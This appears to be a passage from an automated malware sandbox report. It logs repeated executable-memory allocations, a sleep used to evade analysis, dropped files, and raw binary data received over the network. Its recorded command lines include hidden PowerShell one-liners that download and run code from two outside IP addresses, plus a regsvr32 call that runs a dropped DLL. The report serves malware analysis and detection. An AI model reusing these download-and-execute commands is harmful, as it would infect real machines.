protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023b9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e53000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e54000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e55000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e56000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e57000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e59000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e5f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e61000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e63000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e64000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description powershell.exe tried to sleep 170 seconds, actually delayed analysis time by 170 seconds
file C:\Users\Public\Videos\trendmicro2.dll
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://108.62.12.61:99/home'))"
cmdline powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://194.5.212.190/load/trendmicro2.dll','C:\users\public\videos\trendmicro2.dll')
cmdline regsvr32 C:\users\public\videos\trendmicro2.dll
cmdline powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://108.62.12.61:80/home2'))"
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2840
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 155648
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x07440000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received $(HDÈL‹ÈH‹D$8L‹H‹”$˜H‹Œ$è{ëL‹L$PL‹D$pH‹T$ H‹Œ$è,H‹D$ H‹L$(HÈHÄˆÃÌÌÌÌÌÌL‰D$H‰T$H‰L$HìˆH‹Œ$è äÿÿH‰D$HH‹„$H‰D$XH‹D$XH‰D$0H‹D$XHƒÀH‰D$8H‹D$0H‹H‹Œ$˜H+ÈH‹ÁHÁøH‰D$(H‹D$8H‹L$0H‹ H‹H+ÁHÁøH‰D$`H‹Œ$èû'H9D$`uèïH‹D$`HÿÀH‰D$pH‹T$pH‹Œ$èÀH‰D$PH‹T$PH‹L$Hè H‰D$ HkD$( H‹L$ HD H‰D$hH‹D$hH‰D$@H‹Œ$ è«ÕÿÿH‰D$xHkL$( H‹T$ HÑH‹ÊèÕÿÿH‹L$xL‹ÁH‹ÐH‹L$Hè«HkD$( H‹L$ HÈH‹ÁH‰D$@H‹D$8H‹H9„$˜u$L‹L$ H‹D$8L‹H‹D$0H‹H‹Œ$è¡ë]L‹L$ L‹„$˜H‹D$0H‹H‹Œ$èÝH‹D$ H‰D$@HkD$( H‹L$ HD L‹ÈH‹D$8L‹H‹”$˜H‹Œ$è£ëL‹L$PL‹D$pH‹T$ H‹Œ$èHkD$( H‹L$ HÈH‹ÁHÄˆÃÌÌÌÌÌÌÌÌÌÌÌL‰D$H‰T$H‰L$HìˆH‹Œ$èíáÿÿH‰D$HH‹„$H‰D$XH‹D$XH‰D$0H‹D$XHƒÀH‰D$8H‹D$0H‹H‹Œ$˜H+ÈH‹ÁHÁøH‰D$(H‹D$8H‹L$0H‹ H‹H+ÁHÁøH‰D$`H‹Œ$èÛ%H9D$`uèÏH‹D$`HÿÀH‰D$pH‹T$pH‹Œ$è H‰D$PH‹T$PH‹L$HèìH‰D$ HkD$( H‹L$ HD H‰D$hH‹D$hH‰D$@H‹Œ$ è‹ÓÿÿH‰D$xHkL$( H‹T$ HÑH‹ÊèpÓÿÿH‹L$xL‹ÁH‹ÐH‹L$HèÛHkD$( H‹L$ HÈH‹ÁH‰D$@H‹D$8H‹H9„$˜u$L‹L$ H‹D$8L‹H‹D$0H‹H‹Œ$èë]L‹L$ L‹„$˜H‹D$0H‹H‹Œ$è½H‹D$ H‰D$@HkD$( H‹L$ HD L‹ÈH‹D$8L‹H‹”$˜H‹Œ$èƒëL‹L$PL‹D$pH‹T$ H‹Œ$èôHkD$( H‹L$ HÈH‹ÁHÄˆÃÌÌÌÌÌÌÌÌÌÌÌH‰L$Hƒì8ÆD$ H¸ÿÿÿÿÿÿÿH‰D$(H¸ÿÿÿÿÿÿÿH9D$@vèâÿÿH‹D$@HÁàHƒÄ8ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌH‰L$Hƒì8ÆD$ H¸ÿÿÿÿÿÿÿH‰D$(H¸ÿÿÿÿÿÿÿH9D$@vèÍáÿÿHkD$@ HƒÄ8ÃÌÌH‰L$H‹D$H‹ÃÌÌDˆL$ DˆD$H‰T$H‰L$HìˆH‹„$H‰D$0H‹D$0H‹@H‰D$8H‹Œ$è­çÿÿH+D$8H;„$˜sè©âÿÿH‹„$˜H‹L$8HÈH‹ÁH‰D$HH‹D$0H‹@H‰D$XH‹T$HH‹Œ$èáÝÿÿH‰D$PH‹Œ$è¯ÞÿÿH‰D$hH‹D$PHÿÀH‹ÐH‹L$hèeâÿÿH‰D$@H‹L$0èVÑÿÿH‹D$0H‹L$HH‰HH‹D$0H‹L$PH‰HH‹L$@èàÐÿÿH‰D$pHƒ|$XrfH‹D$0H‹H‰D$`H‹L$`è¼Ðÿÿ¶Œ$¨ˆL$ L‹L$8L‹ÀH‹T$pHŒ$ èV H‹D$XHÿÀL‹ÀH‹T$`H‹L$hè¼äÿÿH‹D$0H‹L$@H‰ë=H‹D$0¶Œ$¨ˆL$ L‹L$8L‹ÀH‹T$pHŒ$ è H‹D$0HT$@H‹ÈèàÏÿÿH‹„$HÄˆÃL‰L$ L‰D$H‰T$H‰L$Hƒì(H‹L$0è~ÝÿÿL‹ÈL‹D$HH‹T$@H‹L$8èHƒÄ(ÃÌÌL‰L$ L‰D$H‰T$H‰L$HƒìXHL$`èÞýÿÿH‰D$ HL$hèÏýÿÿH‰D$(L‹D$xH‹T$pHL$8薐ëH‹D$ HƒÀ H‰D$ H‹D$(H9D$ tH‹T$ HL$8èzóÿÿëÕHL$8è.H‰D$0HL$8èH‹D$0HƒÄXÃÌÌÌÌÌL‰L$ L‰D$H‰T$H‰L$HƒìXHL$`è>ýÿÿH‰D$ HL$hè/ýÿÿH‰D$(H‹L$pèÏÿÿL‹ÀH‹T$(H‹L$ èžñÿÿH‹D$ H‹L$(H+ÈH‹ÁHÁøH‹L$pHÁëgL‹D$xH‹T$pHL$8è»ëH‹D$ HƒÀH‰D$ H‹D$(H9D$ tH‹L$ è•ÎÿÿH‹ÐHL$8èøòÿÿëÍHL$8èLH‰D$0HL$8èýH‹D$0HƒÄXÃÌÌÌL‰L$ L‰D$H‰T$H‰L$HƒìXHL$`è^üÿÿH‰D$ HL$hèOüÿÿH‰D$(L‹D$xH‹T$pHL$8èëH‹D$ HƒÀ H‰D$ H‹D$(H9D$ tH‹L$ èïÍÿÿH‹ÐHL$8è²òÿÿëÍHL$8è¦H‰D$0HL$8è‡H‹D$0HƒÄXÃÌÌÌÌÌÌÌÌÌÌÌÌÌH‰T$H‰L$HkD$ H‹L$HH‹L$H‰ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌL‰D$H‰T$H‰L$Hƒì8HT$PHL$HèÎÙÿÿHL$PètûÿÿH‰D$(HL$HèeûÿÿD¶L$ H‹L$(L‹ÁH‹ÐH‹L$@è:îÿÿHƒÄ8ÃÌÌÌÌÌL‰D$H‰T$H‰L$Hƒì8H‹L$HèÍÿÿH‹Ð¹èFÖÿÿH‰D$ H‹L$PèçÌÿÿH‹L$ H‹H‰HƒÄ8ÃÌÌÌÌÌÌÌL‰D$H‰T$H‰L$Hƒì8H‹L$Hè³ÌÿÿH‹Ð¹ èöÕÿÿH‰D$ H‹L$Pè—ÌÿÿH‹ÐH‹L$ èZHƒÄ8ÃÌÌÌÌÌL‰D$H‰T$H‰L$Hƒì8H‹L$HècÌÿÿH‹Ð¹ è¦ÕÿÿH‰D$ H‹L$PèGÌÿÿH‹ÐH‹L$ èªÐÿÿHƒÄ8ÃÌÌÌÌÌH‰T$H‰L$Hƒì(3ÒH‹L$8èvHƒÄ(ÃÌH‰T$H‰L$H‹D$H‹L$H+ÈH‹ÁHÁøÃÌH‰T$H‰L$HƒìHH‹D$PH‰D$ H‹D$ HƒÀH‰D$(H‹D$(H‹L$ H‹IH9tH‹L$Xè­ËÿÿH‹ÐH‹L$PèÐðÿÿë$H‹L$Xè”ËÿÿL‹ÀH‹D$(H‹H‹L$Pè¿òÿÿH‰D$0HƒÄHÃÌÌÌÌÌH‰T$H‰L$HƒìHH‹D$PH‰D$ H‹D$ HƒÀH‰D$(H‹D$(H‹L$ H‹IH9tH‹L$Xè-ËÿÿH‹ÐH‹L$Pèñÿÿë$H‹L$XèËÿÿL‹ÀH‹D$(H‹H‹L$PèOôÿÿH‰D$0HƒÄHÃÌÌÌÌÌH‰T$H‰L$HƒìHH‹D$PH‰D$ H‹D$ HƒÀH‰D$(H‹D$(H‹L$ H‹IH9tH‹L$Xè­ÊÿÿH‹ÐH‹L$Pè0ñÿÿë$H‹L$Xè”ÊÿÿL‹ÀH‹D$(H‹H‹L$PèïõÿÿH‰D$0HƒÄHÃÌÌÌÌÌH‰T$H‰L$HƒìH‹D$ H‹H‰$H‹D$ H‹L$(H‹ H‰H‹$HƒÄÃÌÌÌÌÌÌÌÌÌÌÌÌÌH‰T$H‰L$Hƒì(H‹T$8HL$0ècüÿÿH‹D$0HƒÄ(ÃÌÌÌÌÌÌÌÌÌL‰D$H‰T$H‰L$H‹D$H‹L$H‰H‹D$H‹L$H‰HH‹D$H‹L$H‰HH‹D$ÃÌÌH‰L$H‹D$HÇH‹D$HÇ@H‹D$HÇ@H‹D$ÃÌÌÌÌÌÌÌÌÌÌÌÌÌ
Data received ÌÌL‰L$ L‰D$H‰T$H‰L$H‹D$H‹L$H‰H‹D$H‹L$H‰HH‹D$H‹L$ H‰HH‹D$ÃÌÌÌÌÌÌÌÌÌÌÌÌÌH‰T$H‰L$Hƒì8H‹L$Hè˜ÖÿÿH‹ÐHL$!è‹H‹L$@L‹À¶T$"è™ÇÿÿH¹èH‰D$(H‹D$@L‹ÀH‹T$(HL$ èÏÿÿH‹T$HH‹L$@è6HL$ è ÉÿÿH‹D$@HƒÄ8ÃÌH‰L$Hƒì8H‹D$@¶T$ H‹ÈèéÿÿH‹D$@HQèH‹ÈèñÔÿÿH‹D$@HƒÄ8ÃÌÌÌÌÌÌÌH‰T$H‰L$HƒìxHÇD$1H‹„$ˆHƒÀHT$1H‹ÈèÐýÿÿH‰D$PHÇD$9H‹„$ˆHƒÀHT$9H‹Èè©ýÿÿH‰D$XHÇD$AH‹„$ˆHT$AH‹Èè†ýÿÿH‰D$`H‹Œ$ˆèdÕÿÿH‹ÈèÜÇÿÿH‹Œ$€HT$PH‰T$(HT$XH‰T$ LL$`L‹À¶T$0èNèÿÿH‹„$€HgçH‹ÈèÔÿÿH‹„$ˆH‹Œ$€H‹ÐèïÓÿÿH‹„$€HƒÄxÃÌÌH‰L$Hƒì(H‹D$0L‹@H‹D$0H‹PH‹D$0H‹èøêÿÿHƒÄ(ÃÌÌÌH‰L$Hƒì(H‹D$0L‹@H‹D$0H‹PH‹D$0H‹èØêÿÿHƒÄ(ÃÌÌÌH‰L$Hƒì(H‹L$0èíHƒÄ(ÃÌÌÌÌÌÌÌÌH‰L$Hƒì(H‹L$0è HƒÄ(ÃÌÌÌÌÌÌÌÌH‰T$H‰L$WHƒì0H‹L$Hè·ÆÿÿH9D$@t&HD$ H‹ø3À¹óªD¶D$ H‹T$HH‹L$@èjH‹D$@HƒÄ0_ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌH‰T$H‰L$HƒìH‹D$ H‰$HkD$( H‹ $HHƒÄÃÌÌÌÌÌÌÌL‰L$ L‰D$H‰T$H‰L$Hƒì8L‹D$XH‹T$PH‹L$HèôÙÿÿH‹D$XH‹L$HHÈH‹ÁHT$`H‹Èè·ØÿÿÆ
Data received H‹D$D‹L$LȋÁiL$ – +ÁiL$ƒ,+ÁÁø ¹HkÉH‹T$‰ ‹D$H‹L$DȋÁiL$ÿÁiL$l++ÁiL$͍„Áø ¹HkÉH‹T$‰ ‹D$H‹L$LȋÁiL$ Û3+ÁiL$=+ÁÁø ¹HkÉH‹T$‰ ‹D$4‹L$$ȋÁiÀ*)‰D$‹D$8‹L$$ȋÁiÀ4"‰D$‹D$<‹L$$ȋÁiÀw‰D$ ‹D$‹L$ȋÁD$ iL$$ 7+ÁiL$@À Á‰D$ ‹D$8‹L$4ȋÁiÀ‰çÿÿ‰D$‹D$<‹L$4ȋÁiÀ5Óÿÿ‰$‹$‹L$ȋÁiL$4Ø(ÁiL$@4"+Á‹L$ȋÁ‰D$‹D$<‹L$8ȋÁiÀÀ ‰D$$‹D$$‹L$ȋÁiL$8¦?+ÁiL$@Ë,L$ȋÁ‰D$‹D$$‹ $ȋÁiL$<Ç)ÁiL$@*)+Á‹L$ ȋÁ‰D$ ‹D$ Áø ¹HkÉH‹T$‰ ‹D$Áø ¹HkÉH‹T$‰ ‹D$Áø ¹HkÉH‹T$‰ ‹D$ Áø ¹HkÉH‹T$‰ ‹D$0ÿÀ‰D$0ƒ|$0tƒ|$0 uëH‹D$HƒÀ H‰D$ë HD$`H‰D$é¹úÿÿH‹„$àH‰D$HD$`H‰D$PÇD$0ë ‹D$0ÿȉD$0ƒ|$0Œü¸HkÀ¹HkÉH‹T$‹H‹T$P ‰D$ ¸HkÀ¹HkÉH‹T$‹H‹T$P ‰D$¸HkÀ¹HkÉH‹T$‹H‹T$P ‰D$¸HkÀ¹HkÉ8H‹T$‹H‹T$ ‰D$ ¸HkÀ ¹HkÉ0H‹T$‹H‹T$ ‰D$¸HkÀ(H‹L$‹‰$¸HkÀ¹HkÉH‹T$L‹D$PA‹ ‹+Á‰D$$¸HkÀ¹HkÉH‹T$L‹D$PA‹ ‹+Á‰D$4¸HkÀ¹HkÉH‹T$L‹D$PA‹ ‹+Á‰D$8¸HkÀ¹HkÉ8H‹T$L‹D$A‹ ‹+Á‰D$<¸HkÀ ¹HkÉ0H‹T$L‹D$A‹ ‹+Á‰D$@‹D$‹L$ ȋÁD$D$ D$$iÀÚ!@Áø¹HkÉH‹T$‰ ‹$‹ $ȋÁ‰$‹$‹L$ +ȋÁ‰D$ ‹$‹L$+ȋÁ‰D$‹$‹L$+ȋÁ‰D$‹$‹L$ +ȋÁ‰D$ ‹$‹L$+ȋÁ‰D$‹D$ ‹L$ ȋÁiÀï-‹L$‹T$ыÊiÉÐÁ‰D$L‹D$ ‹L$+ȋÁiÀZ‰D$D‹D$‹L$ +ȋÁiÀF(‰D$H‹D$D‹L$LȋÁiL$ y"+ÁiL$/+Á@Áø¹HkÉH‹T$‰ ‹D$H‹L$DȋÁiL$ÁiL$ï-+ÁiL$㍄@Á
Data received ‹L$PȋÁÁø%ÿH˜¹HkÉH‹T$8L‹D$@A¶ˆ ‹D$‹L$P+ȋÁÁø%ÿH˜¹HkÉ H‹T$8L‹D$@A¶ˆ ‹D$(‹L$TȋÁÁø%ÿH˜¹HkÉH‹T$8L‹D$@A¶ˆ ‹D$(‹L$T+ȋÁÁø%ÿH˜¹HkÉH‹T$8L‹D$@A¶ˆ ‹D$,‹L$XȋÁÁø%ÿH˜¹HkÉH‹T$8L‹D$@A¶ˆ ‹D$,‹L$X+ȋÁÁø%ÿH˜¹HkÉH‹T$8L‹D$@A¶ˆ ‹D$‹L$\ȋÁÁø%ÿH˜¹HkÉH‹T$8L‹D$@A¶ˆ ‹D$‹L$\+ȋÁÁø%ÿH˜¹HkÉH‹T$8L‹D$@A¶ˆ H‹D$ HƒÀ H‰D$ é™úÿÿH‹Œ$ðH3Ìèg[HÄÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌL‰L$ L‰D$H‰T$H‰L$Hì8H‹Öc H3ÄH‰„$ H‹„$@H‹€˜H-€H‰D$@H‹„$PH‰D$`H‹„$HH‹@XH‰D$hH„$€H‰D$(ÇD$0ë4‹D$0ÿÀ‰D$0H‹D$`HƒÀH‰D$`H‹D$hHƒÀH‰D$hH‹D$(HƒÀH‰D$(ƒ|$0‹¸HkÀH‹L$`¿¹HkÉH‹T$h¯ ‰$‹$Áà ‰$‹$‰$¸HkÀH‹L$`¿¹HkÉH‹T$h¯ ‰D$ ¸HkÀ H‹L$`¿¹HkÉ H‹T$h¯ ‰D$¸HkÀ0H‹L$`¿¹HkÉ0H‹T$h¯ ‰D$‹D$‹L$ȋÁ‰D$$‹D$‹L$+ȋÁ‰D$iD$$ù$‰D$iD$$‰D$iD$ ñ+D$D$‰D$HiD$ +D$D$‰D$PiD$$ ‰D$iD$•$‰D$iD$ à!+D$D$‰D$LiD$ î×ÿÿD$D$‰D$\iD$$ò ‰D$iD$þ+$‰D$iD$ Œúÿÿ+D$+D$‰D$TiD$ KæÿÿD$+D$‰D$X‹D$ ‹L$+ȋÁiÀA-$‰D$p¸HkÀH‹L$`¿¹HkÉH‹T$h¯ ‰$¸HkÀH‹L$`¿¹HkÉH‹T$h¯ ‰D$ ¸HkÀ(H‹L$`¿¹HkÉ(H‹T$h¯ ‰D$¸HkÀ8H‹L$`¿¹HkÉ8H‹T$h¯ ‰D$‹D$ ‹ $ȋÁiÀP*‰D$‹D$‹ $ȋÁiÀ>%‰D$‹D$‹ $ȋÁ‰D$ iD$ ‰D$‹D$‹L$ȋÁD$i $¥@+Á‰D$$‹D$‹L$ ȋÁiÀ+õÿÿ‰D$iD$ Ë‹L$ȋÁ‹L$ȋÁ‰D$iD$O2‹L$+ȋÁ‹L$ȋÁ‰D$‹D$‹L$ ȋÁiÀÂÚÿÿ‰D$‹D$‹L$ȋÁ‰D$iD$”F‹L$ȋÁ‹L$ȋÁ‰D$‹D$‹L$ȋÁiÀøêÿÿ‰D$‹D$‹L$ȋÁ‰D$‹D$‹L$ȋÁ‰D$iD$ Õ ‰D$ i$3 ‹L$ ȋÁiL$ ê+Á‰D$‹D$ ‹L$+ȋÁiÀ‰$‹$‹L$ȋÁ‰D$iD$N ‹ $ȋÁiL$Á7+Á‹L$ ȋÁ‰D$ ‹D$$‹L$HȋÁÁø ¹HkÉH‹T$(‰ ‹D$$‹L$H+ȋÁÁø ¹HkÉ`H‹T$(‰ ‹D$‹L$LȋÁÁø ¹HkÉH‹T$(‰ ‹D$‹L$L+ȋÁÁø ¹HkÉXH‹T$(‰ ‹D$‹L$PȋÁÁø ¹HkÉH‹T$(‰ ‹D$‹L$P+ȋÁÁø ¹HkÉPH‹T$(‰ ‹D$‹L$TȋÁÁø ¹HkÉH‹T$(‰ ‹D$‹L$T+ȋÁÁø ¹HkÉHH‹T$(‰ ‹D$‹L$XȋÁÁø ¹HkÉ H‹T$(‰ ‹D$‹L$X+ȋÁÁø ¹HkÉ@H‹T$(‰ ‹D$ ‹L$\ȋÁÁø ¹HkÉ(H‹T$(‰ ‹D$ ‹L$\+ȋÁÁø ¹HkÉ8H‹T$(‰ ‹D$pÁø ¹HkÉ0H‹T$(‰ é6úÿÿH„$€H‰D$(ÇD$0ë ‹D$0ÿÀ‰D$0ƒ|$0 øHcD$0‹Œ$`H‹”$XH ÂH‹ÁH‰D$8¸HkÀH‹L$(‹@‰$‹$Áà ‰$¸HkÀH‹L$(‹‰D$ ¸HkÀH‹L$(‹‰D$¸HkÀH‹L$(‹‰D$‹D$‹L$ȋÁ‰D$$‹D$‹L$+ȋÁ‰D$iD$$ù$‰D$iD$$‰D$iD$ ñ+D$D$‰D$HiD$ +D$D$‰D$PiD$$ ‰D$iD$•$‰D$iD$ à!+D$D$‰D$LiD$ î×ÿÿD$D$‰D$\iD$$ò ‰D$iD$þ+$‰D$iD$ Œúÿÿ+D$+D$‰D$TiD$ KæÿÿD$+D$‰D$X‹D$ ‹L$+ȋÁiÀA-$‰D$p¸HkÀH‹L$(‹‰$¸HkÀH‹L$(‹‰D$ ¸HkÀH‹L$(‹‰D$¸HkÀH‹L$(‹‰D$‹D$ ‹ $ȋÁiÀP*‰D$‹D$‹ $ȋÁiÀ>%‰D$‹D$‹ $ȋÁ‰D$ iD$ ‰D$‹D$‹L$ȋÁD$i $¥@+Á‰D$$‹D$‹L$ ȋÁiÀ+õÿÿ‰D$iD$ Ë‹L$ȋÁ‹L$ȋÁ‰D$iD$O2‹L$+ȋÁ‹L$ȋÁ‰D$‹D$‹L$ ȋÁiÀÂÚÿÿ‰D$‹D$‹L$ȋÁ‰D$iD$”F‹L$ȋÁ‹L$ȋÁ‰D$‹D$‹L$ȋÁiÀøêÿÿ‰D$‹D$‹L$ȋÁ‰D$‹D$‹L$ȋÁ‰D$iD$ Õ ‰D$ i$3 ‹L$ ȋÁiL$ ê+Á‰D$‹D$ ‹L$+ȋÁiÀ
Data received @HÿÀH‹L$XH‰A‹„$ÌÁà‹L$@ȋÁ‰D$@ÇD$H‹D$DÑà‰D$D‹D$@Ñà‰D$@‹D$HÿȉD$H|$D€‚ÿÿÿëH‹D$PH‹‹@‰D$`‹„$x‹L$`3ȋÁ‰D$`ƒ|$`t‹D$p÷؉„$@ë ‹D$p‰„$@kD$t‹ÀH‹Œ$ˆ‹”$@‰¸HkÀÿH‹L$h‹ºè¹HkÉÿH‹T$h‰ ‹D$`ÁàƒÈÁà ‹L$d ȋÁ‰D$d¸HkÀH‹L$h‹ºè ¹HkÉH‹T$h‰ 3À…À„ŽH‹D$hH-H‰„$‹D$`ÁàºèH‹Œ$‹ ȋÁH‹Œ$‰¸HkÀÿH‹Œ$‹ºè¹HkÉÿH‹”$‰ ¸HkÀH‹Œ$‹ºè¹HkÉH‹”$‰ 3Àƒø„‹H‹D$hHH‰„$ЋD$`ÁàƒÈH‹Œ$Ћ ȋÁH‹Œ$Љ¸HkÀÿH‹Œ$ЋƒÈ¹HkÉÿH‹”$Љ ¸HkÀH‹Œ$ЋƒÈ¹HkÉH‹”$Љ ‹D$dºè‰D$dH‹D$h‹L$d‰éíØÿÿéŸØÿÿH‹D$XH‹L$PH‰ˆÀH‹D$X‹L$@‰H‹D$X‹L$D‰HH‹D$X‹L$H‰Hƒ|$|@ƒÉÇD$xë,‹D$xÿÀ‰D$xH‹„$ˆHƒÀH‰„$ˆH‹D$hHƒÀH‰D$h‹D$t9D$xƒ…Ç„$€ë‹„$€ÿÀ‰„$€¸@+D$|9„$€sQ‹„$€¯D$t‹ÀH‹Œ$ˆHÇD$0ÇD$(B‹Œ$€‰L$ 